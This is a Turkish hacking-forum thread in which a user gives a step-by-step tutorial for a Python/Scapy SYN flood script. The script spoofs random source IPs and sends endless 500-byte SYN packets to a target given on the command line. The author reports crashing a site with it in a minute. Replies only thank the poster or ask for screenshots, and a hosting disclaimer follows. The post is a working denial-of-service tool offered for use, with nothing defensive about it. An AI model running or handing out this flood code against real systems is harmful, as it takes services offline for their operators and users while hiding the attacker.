Python ile SYN Flood saldırı script'i yapmak

Emirr_

Üye
22 Eki 2023
53
16
Bilemezsin
Bu script'i çalıştırmak için Python 3.0 ve Scapy gereklidir! (Scapy'i indirmek için "pip install scapy" kodunu kullanınız)

İlk başta gerekli olan kütüphaneleri entegre etmemiz lazım

from scapy.all import *
import sys

Sonradan yavaşça programımızı kodlamaya başlayabiliriz

target_ip = sys.argv[1]
target_port = 80

Burada IP ve Port belirlenmiş oluyor, buraları ellemeyin çünkü programın kullanımı biraz farklı olacak :)

Şimdi ise diğer kodlara geçelim

ip = IP(dst=target_ip)

Burada saldırı host'unun kim olduğunu belirliyoruz saldırı hostuda biz olduğumuz için kendimiz olarak kodluyoruz

Ancak IP'nizin gizlenmesini istiyorsanız şu kodu girebilirsiniz

ip = IP(src=RandIP("10.0.0.1/24"), dst=target_ip)

Bu kod IP Spoofing kodudur ve ip adresimizi gizler

Sonra ise SYN Etiketimizi belirleyeceğiz

tcp = TCP(sport=RandShort(), dport=target_port, flags="S")

Göndereceğimiz paket bayt'ını belirleyeceğiz

raw = Raw(b"X"*500)

Bayt'ın 500 olmasını öneririm

Bir etiket daha koyacağız

p = ip / tcp / raw

Şimdi ise loop kodunu vereceğiz

send(p, loop=1, verbose=0)

Verbose = 0 olduğu için saldırı başladığında bir şey gözükmeyecektir ancak Verbose = 1 yaparsanız saldırı yapıp yapmadığı gözükür

Peki nasıl kullanacağız?

Linux kullanıyorsanız terminal veya Windows ise CMD açacaksınız ve "python flood.py [IP]" şeklinde yazacaksınız. (Saldırıyı kendi local sitemde denedim ve 1 dakika içinde çöküş yaşadı, saldırıyı fazla devam ettirmenizi önermem çünkü internetim güçlü olmasına rağmen internet kesintisi veya yavaşlaması yaşadım kullandığımda)

Bu benim ilk konum o yüzden hatam varsa kusura bakmayın ve hatamı bana söylerseniz sevinirim :)

ACE Veen

Uzman üye
4 Şub 2023
1,111
563
Belirsiz
Bu script'i çalıştırmak için Python 3.0 ve Scapy gereklidir! (Scapy'i indirmek için "pip install scapy" kodunu kullanınız)

Burada IP ve Port belirlenmiş oluyor, buraları ellemeyin çünkü programın kullanımı biraz farklı olacak :)

Burada saldırı host'unun kim olduğunu belirliyoruz saldırı hostuda biz olduğumuz için kendimiz olarak kodluyoruz

Verbose = 0 olduğu için saldırı başladığında bir şey gözükmeyecektir ancak Verbose = 1 yaparsanız saldırı yapıp yapmadığı gözükür

Peki nasıl kullanacağız?

Linux kullanıyorsanız terminal veya Windows ise CMD açacaksınız ve "python flood.py [IP]" şeklinde yazacaksınız. (Saldırıyı kendi local sitemde denedim ve 1 dakika içinde çöküş yaşadı, saldırıyı fazla devam ettirmenizi önermem çünkü internetim güçlü olmasına rağmen internet kesintisi veya yavaşlaması yaşadım kullandığımda)

Bu benim ilk konum o yüzden hatam varsa kusura bakmayın ve hatamı bana söylerseniz sevinirim :)
eline sağlık

x1axe

Yeni üye
28 May 2022
42
9

Peki nasıl kullanacağız?

eline sağlık

AKTUĞ1

Ar-Ge Ekibi Analist
23 Haz 2015
2,375
365
Öncelikle emeğine sağlık. Resim eklesen daha anlaşılır olur. Bir konu hazırlarken özenerek yapmak kişiye ayrı bir motivasyon verir. Bu biraz gelişi güzel olmuş. Bir daha ki hazırlayacağın konuları özenerek yaparsan konuların en iyi mertebelerde olur. Başarılar Dilerim...

Emirr_

Üye
22 Eki 2023
53
16
Bilemezsin
Öncelikle emeğine sağlık. Resim eklesen daha anlaşılır olur. Bir konu hazırlarken özenerek yapmak kişiye ayrı bir motivasyon verir. Bu biraz gelişi güzel olmuş. Bir daha ki hazırlayacağın konuları özenerek yaparsan konuların en iyi mertebelerde olur. Başarılar Dilerim...
İlk konum olduğu için aşırı fazla bilgim yoktu bu site hakkında, kullanıyordum bayadır ancak daha yeni üye oldum. Bir dahaki konularıma resim koyarak devam ederim muhtemelen :) Yorumunuz için teşekkürler

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.